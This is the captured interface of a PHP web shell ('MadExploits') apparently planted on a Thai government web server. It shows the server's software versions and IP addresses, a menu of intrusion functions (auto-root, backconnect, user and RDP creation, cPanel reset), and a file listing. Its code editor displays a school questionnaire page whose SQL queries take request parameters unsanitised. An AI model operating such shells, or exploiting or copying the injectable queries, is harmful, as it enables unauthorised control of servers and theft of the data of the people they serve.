Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
questionnaire /
main /
[ HOME SHELL ]
Name
Size
Permission
Action
answer_qtn.php
20.81
KB
-rw-r--r--
create_qtn.php
9.78
KB
-rw-r--r--
create_question.php
18.13
KB
-rw-r--r--
create_use_qtn_detail.php
6.47
KB
-rw-r--r--
create_use_qtn_name.php
18.79
KB
-rw-r--r--
on_off_qtn.php
7.32
KB
-rw-r--r--
report1.php
14.43
KB
-rw-r--r--
report2.php
15.14
KB
-rw-r--r--
report3.php
5.03
KB
-rw-r--r--
school_group.php
14.59
KB
-rw-r--r--
school_group_show.php
7.51
KB
-rw-r--r--
upload_1.php
7.97
KB
-rw-r--r--
upload_2.php
1.69
KB
-rw-r--r--
view_qtn.php
16.22
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : view_qtn.php
<?php /** ensure this file is being included by a parent file */ defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' ); $officer=$_SESSION['login_user_id']; require_once "modules/questionnaire/time_inc.php"; //ส่วนหัว echo "<br />"; if(!(($index==1) or ($index==2) or ($index==5))){ echo "<table width='100%' border='0' align='center'>"; echo "<tr align='center'><td><font color='#006666' size='3'><strong>ชุดคำถาม</strong></font></td></tr>"; echo "</table>"; echo "<br />"; } //ส่วนยืนยันการลบข้อมูล if($index==2) { echo "<table width='500' border='0' align='center'>"; echo "<tr><td align='center'><font color='#990000' size='4'>โปรดยืนยันความต้องการลบข้อมูลอีกครั้ง</font><br></td></tr>"; echo "<tr><td align=center>"; echo "<br><INPUT TYPE='button' name='smb' value='ยืนยัน' onclick='location.href=\"?option=questionnaire&task=main/view_qtn&index=3&id=$_GET[qq_id]\"'> <INPUT TYPE='button' name='back' value='ยกเลิก' onclick='location.href=\"?option=questionnaire&task=main/view_qtn\"'"; echo "</td></tr></table>"; } //ส่วนลบข้อมูล if($index==3){ $sql="select * from questionnaire_qq_member where qtn_qq_id='$_GET[id]' "; $row = mysqli_query($connect,$sql); while($result=mysqli_fetch_array($row)){ $qtn_qq_m_id=$result['qtn_qq_m_id']; $sql2="select * from questionnaire_qq_member_other where qtn_qq_m_id='$qtn_qq_m_id' "; $row2 = mysqli_query($connect,$sql2); while($result2=mysqli_fetch_array($row2)){ $qtn_qq_mo_id=$result2['qtn_qq_mo_id']; $sql = "delete from questionnaire_qq_member_other where qtn_qq_m_id='$qtn_qq_m_id' "; $dbquery = mysqli_query($connect,$sql); } $sql = "delete from questionnaire_qq_member where qtn_qq_id='$_GET[id]' "; $dbquery = mysqli_query($connect,$sql); } $sql = "delete from questionnaire_qq where qtn_qq_id=$_GET[id]"; $dbquery = mysqli_query($connect,$sql); } //ส่วนฟอร์มแก้ไขข้อมูล if ($index==5){ echo "<form id='frm1' name='frm1'>"; $sql="SELECT * FROM questionnaire_qq where qtn_qq_id='$_GET[qq_id]' limit 0,1"; $result = mysqli_query($connect,$sql); $row=mysqli_fetch_array($result); $qtn_id=$row['qtn_id']; $qtn_qq_id=$row['qtn_qq_id']; $order_id=$row['order_id']; ?> <BR> <TABLE cellpadding="5" cellspacing="5" border="0" width="75%" align="center"> <TR bgcolor="#AEB6BF" height="30"> <TD colspan="2" align="center"><B>แก้ไขคำถาม</B></TD> </TR> <TR> <TD valign=top class="row2" width="20%">คำถาม</TD> <TD align="left"><INPUT TYPE="text" NAME="qtn_qq_name" VALUE="<?php echo $row['qtn_qq_name']?>" SIZE="80"></TD> </TR> <TR> <TD valign=top class="row2">ลำดับที่คำถาม</TD> <TD align=left> <?php $sql="SELECT * FROM questionnaire_qq where qtn_id='$qtn_id' "; $row = mysqli_query($connect,$sql); $n=1; echo "<Select name='order_id' size='1'>"; while($result=mysqli_fetch_array($row)){ if($order_id==$n){ $select="selected"; } else { $select=""; } echo "<Option value='$n' $select>$n</option> "; $n++; } echo "</Select>"; ?> </TD></TR> <?php echo "<tr><td></td><td>"; echo "<TABLE id='tb_q' cellpadding='5' cellspacing='2' border='0' width='100%' align='center'>"; $sql3="select * from questionnaire_qq_member where qtn_qq_id = $qtn_qq_id order by qtn_qq_m_id"; $result3=mysqli_query($connect,$sql3); $j=0; //echo "<tr>"; $count = mysqli_num_rows($result3); while($row3=mysqli_fetch_row($result3)){ ///////////////////////////////// ตัวเลือกกี่ข้อ ก ข $j++; $qtn_qq_m_id = $row3[0]; $qtn_qq_m_name=$row3[2]; $qtn_qq_m_num=$row3[3]; $min = $row3[4]; $max = $row3[5]; $qtn_qq_m_total = $row3[6]; $qtn_op_id=$row3[7]; echo "<tr><td valign='top' align='left'><b>$j) <INPUT TYPE='text' NAME='qtn_op_m_name$j' size='50' value='$qtn_qq_m_name'> </b></td></tr>"; echo "<tr><td align='left'>"; echo "<Input Type=Hidden Name='item$j' Value='$qtn_qq_m_id'>"; if($qtn_op_id==1){ echo " หน่วย <INPUT TYPE='text' NAME='unit$j' value='$qtn_qq_m_num'>"; echo "<br>"; echo " ค่าต่ำสุด <INPUT TYPE='text' NAME='min$j' value='$min'>"; echo "<br>"; echo " ค่าสูงสุด <INPUT TYPE='text' NAME='max$j' value='$max'>"; echo "<br>"; }else if($qtn_op_id>=4){ $sql4="select * from questionnaire_qq_member_other where qtn_qq_m_id='$qtn_qq_m_id' order by qtn_qq_mo_id"; $result4=mysqli_query($connect,$sql4); $k=1; while($row4=mysqli_fetch_row($result4)){ /////////////////////////// ชื่อ Radio $qtn_qq_mo_id=$row4[0]; echo " <INPUT TYPE='$row4[3]' NAME=''><INPUT TYPE='text' NAME='mo_name$j$k' value='$row4[2]'><br>"; echo "<Input Type=Hidden Name='subitem$j$k' Value='$qtn_qq_mo_id'>"; $k++; } } echo " </td>"; } echo "</tr>"; echo "</table>"; echo "</td></tr>"; ?> <TR> <TD></TD> <TD align=left > <INPUT TYPE="button" name="smb" value="ตกลง" onclick="goto_url(1)"> <INPUT TYPE="button" name="back" value="ย้อนกลับ" onclick="goto_url(0)"> </TD> </TR> </TABLE> <?php echo "<Br>"; echo "<Input Type=Hidden Name='qq_id' Value='$qtn_qq_id'>"; if(isset($qtn_op_id)){ echo "<Input Type=Hidden Name='op_id' Value='$qtn_op_id'>"; } echo "<Input Type=Hidden Name='num' Value='$j'>"; if(isset($qtn_op_id)){ if(($qtn_op_id==4) or ($qtn_op_id==5)){ $k=$k-1; echo "<Input Type=Hidden Name='num2' Value='$k'>"; } } echo "</form>"; } //ส่วนปรับปรุงข้อมูล if ($index==6){ $num=$_POST['num']; $sql = "update questionnaire_qq set qtn_qq_name='$_POST[qtn_qq_name]',order_id='$_POST[order_id]' where qtn_qq_id='$_POST[qq_id]'"; $dbquery = mysqli_query($connect,$sql); for($i=1;$i<=$num;$i++){ $qtn_qq_m_name=$_POST["qtn_op_m_name$i"]; $item=$_POST["item$i"]; if($_POST['op_id']==1){ $qtn_qq_m_num=$_POST["unit$i"]; $qtn_qq_m_min=$_POST["min$i"]; $qtn_qq_m_max=$_POST["max$i"]; $sql = "update questionnaire_qq_member set qtn_qq_m_name='$qtn_qq_m_name',qtn_qq_m_num='$qtn_qq_m_num',qtn_qq_m_min='$qtn_qq_m_min' ,qtn_qq_m_max='$qtn_qq_m_max' where qtn_qq_m_id='$item'"; $dbquery = mysqli_query($connect,$sql); } else if(($_POST['op_id']==2) or ($_POST['op_id']==3)){ $sql = "update questionnaire_qq_member set qtn_qq_m_name='$qtn_qq_m_name' where qtn_qq_m_id='$item'"; $dbquery = mysqli_query($connect,$sql); } else if(($_POST['op_id']==4) or ($_POST['op_id']==5)){ $num2=$_POST['num2']; $sql = "update questionnaire_qq_member set qtn_qq_m_name='$qtn_qq_m_name' where qtn_qq_m_id='$item'"; $dbquery = mysqli_query($connect,$sql); for($k=1;$k<=$num2;$k++){ $subitem=$_POST["subitem$i$k"]; $mo_name=$_POST["mo_name$i$k"]; $sql = "update questionnaire_qq_member_other set qtn_qq_mo_name='$mo_name' where qtn_qq_mo_id='$subitem'"; $dbquery = mysqli_query($connect,$sql); } } } } if($index==7){ ?> <TABLE border="1" width="75%" align="center" style='border-collapse: collapse'> <TR bgcolor="#AEB6BF" height="30"> <TD align="center" style='font-family:Tahoma; font-size:10pt;'><b>ชื่อ : <?php $sql="select * from questionnaire_qtn where qtn_id='$_GET[qtn_id]' limit 0,1"; $dbquery = mysqli_query($connect,$sql); $row=mysqli_fetch_array($dbquery); echo " $row[qtn_name]</td>"; echo "</tr>"; echo "<tr><td colspan='2' valign='top'>"; ///////////////////////////////////////////////// $sql2="select * from questionnaire_qq where qtn_id='$_GET[qtn_id]' order by order_id ,qtn_qq_id"; $result2 = mysqli_query($connect,$sql2); $i=0; $k=0; while($row2=mysqli_fetch_array($result2)){ /////////////////////////// ชื่อคำถามที่ $qtn_qq_id=$row2['qtn_qq_id']; $i++; echo "<TABLE id='tb_q' cellpadding='5' cellspacing='2' border='0' width='100%' align='center'>"; echo "<TR bgcolor='#E6E6E6' height='30'>"; echo "<TD colspan='8' align='left' style='font-family:Tahoma; font-size:10pt;'><b> คำถามที่ $i $row2[2]</b></td>"; if($row2['officer']==$officer){ echo "<td width='30' align='center'><a href=?option=questionnaire&task=main/view_qtn&index=2&qq_id=$qtn_qq_id><img src=images/drop.png border='0' alt='ลบ'></a></td>"; echo "<td width='30' align='center'><a href=?option=questionnaire&task=main/view_qtn&index=5&qq_id=$qtn_qq_id><img src=images/edit.png border='0' alt='แก้ไข'></a></td>"; } else{ echo "<td width='30' align='center'><td width='30' align='center'>"; } echo "</tr>"; //เลือกตัวแปร $sql3="select * from questionnaire_qq_member where qtn_qq_id = $qtn_qq_id order by qtn_qq_m_id"; $result3=mysqli_query($connect,$sql3); $j=0; //echo "<tr>"; $count = mysqli_num_rows($result3); while($row3=mysqli_fetch_row($result3)){ ///////////////////////////////// ตัวเลือกกี่ข้อ ก ข $j++; $qtn_qq_m_id = $row3[0]; $qtn_qq_m_name=$row3[2]; $qtn_qq_m_num=$row3[3]; $min = $row3[4]; $max = $row3[5]; $qtn_qq_m_total = $row3[6]; $qtn_op_id=$row3[7]; echo "<tr><td valign='top' align='left'><b>     $j) $qtn_qq_m_name </b></td></tr>"; echo "<tr><td align='left'>"; if($qtn_op_id==1){ echo " <INPUT TYPE='text' NAME='ch$i' onKeyDown='DigitOnly();' onKeyUp='Setval(this)'> $qtn_qq_m_num"; } else if($qtn_op_id==2){ echo " <INPUT TYPE='text' NAME='ch$i'>"; }else if($qtn_op_id==3){ echo " <TEXTAREA NAME='ch$i' ROWS='7' COLS='50'></TEXTAREA>"; }else if($qtn_op_id>=4){ $sql4="select * from questionnaire_qq_member_other where qtn_qq_m_id='$qtn_qq_m_id' order by qtn_qq_mo_id"; $result4=mysqli_query($connect,$sql4); $k=0; while($row4=mysqli_fetch_row($result4)){ /////////////////////////// ชื่อ Radio echo " <INPUT TYPE='$row4[3]' NAME='ch$i$j'>$row4[2]<br>"; $k++; } } echo " </td>"; } echo "</tr>"; echo "</table>"; } ////////////////////////// echo "</td></tr>"; ?> <TR bgcolor="#AEB6BF" height="10"><TD align="center" style='font-family:Tahoma; font-size:10pt;'></TD></TR> </TABLE> <?php } //ส่วนแสดงผล if(!(($index==1) or ($index==2) or ($index==5) or ($index==7))){ //ส่วนของการแยกหน้า $pagelen=20; // 1_กำหนดแถวต่อหน้า $url_link="option=questionnaire&task=main/view_qtn"; $sql = "select qtn_id from questionnaire_qtn"; $dbquery = mysqli_query($connect,$sql); $num_rows = mysqli_num_rows($dbquery ); $totalpages=ceil($num_rows/$pagelen); if(!(isset($_REQUEST['page']))){ $_REQUEST['page']=""; } if($_REQUEST['page']==""){ $page=$totalpages; if($page<2){ $page=1; } } else{ if($totalpages<$_REQUEST['page']){ $page=$totalpages; if($page<1){ $page=1; } } else{ $page=$_REQUEST['page']; } } $start=($page-1)*$pagelen; if(($totalpages>1) and ($totalpages<16)){ echo "<div align=center>"; echo "หน้า "; for($i=1; $i<=$totalpages; $i++) { if($i==$page){ echo "[<b><font size=+1 color=#990000>$i</font></b>]"; } else { echo "<a href=$PHP_SELF?$url_link&page=$i>[$i]</a>"; } } echo "</div>"; } if($totalpages>15){ if($page <=8){ $e_page=15; $s_page=1; } if($page>8){ if($totalpages-$page>=7){ $e_page=$page+7; $s_page=$page-7; } else{ $e_page=$totalpages; $s_page=$totalpages-15; } } echo "<div align=center>"; if($page!=1){ $f_page1=$page-1; echo "<<a href=$PHP_SELF?$url_link&page=1>หน้าแรก </a>"; echo "<<<a href=$PHP_SELF?$url_link&page=$f_page1>หน้าก่อน </a>"; } else { echo "หน้า "; } for($i=$s_page; $i<=$e_page; $i++){ if($i==$page){ echo "[<b><font size=+1 color=#990000>$i</font></b>]"; } else { echo "<a href=$PHP_SELF?$url_link&page=$i>[$i]</a>"; } } if($page<$totalpages) { $f_page2=$page+1; echo "<a href=$PHP_SELF?$url_link&page=$f_page2> หน้าถัดไป</a>>>"; echo "<a href=$PHP_SELF?$url_link&page=$totalpages> หน้าสุดท้าย</a>>"; } echo "</div>"; } //จบแยกหน้า $sql = "select *,questionnaire_qtn.qtn_id from questionnaire_qtn left join person_main on questionnaire_qtn.officer=person_main.person_id order by questionnaire_qtn.qtn_id limit $start,$pagelen"; $dbquery = mysqli_query($connect,$sql); echo "<table width='80%' border='1' align='center' style='border-collapse: collapse'>"; echo "<Tr bgcolor='#E6E6E6'><Td align='center' width='50'>ที่</Td><Td align='center'>เรื่อง</Td><Td align='center'>งาน</Td><Td align='center'>วันที่สร้าง</Td><Td align='center' width='150'>ผู้สร้าง</Td><Td align='center' width='50'>แสดง</Td></Tr>"; $N=(($page-1)*$pagelen)+1; //*เกี่ยวข้องกับการแยกหน้า $M=1; While ($result = mysqli_fetch_array($dbquery)) { $id = $result['qtn_id']; $prename = $result['prename']; $name = $result['name']; $surname = $result['surname']; if(($M%2) == 0) $color="#FFFFC"; else $color="#FFFFFF"; echo "<Tr bgcolor=$color><Td align='center'>$N</Td>"; echo "<Td align='left'>$result[qtn_name]</Td>"; echo "<Td align='left'>$result[qtn_job]</Td>"; echo "<Td align='center'>"; echo thai_date_3($result['rec_date']); echo "</Td>"; echo "<Td align='left'>$prename$name $surname</Td>"; echo "<Td align='center'><a href=?option=questionnaire&task=main/view_qtn&index=7&qtn_id=$id&page=$page><img src=images/browse.png border='0' alt='แสดง'></a></Td></Tr>"; $M++; $N++; //*เกี่ยวข้องกับการแยกหน้า } echo "</Table>"; } ?> <script> function goto_url(val){ if(val==0){ callfrm("?option=questionnaire&task=main/view_qtn"); // page ย้อนกลับ }else if(val==1){ callfrm("?option=questionnaire&task=main/view_qtn&index=6"); //page ประมวลผล } } function goto_url_update(val){ if(val==0){ callfrm("?option=questionnaire&task=main/view_qtn"); // page ย้อนกลับ }else if(val==1){ if(frm1.qtn_name.value == ""){ alert("กรุณากรอกชื่อชุดคำถาม"); }else{ callfrm("?option=questionnaire&task=main/view_qtn&index=6"); //page ประมวลผล } } } </script>
Close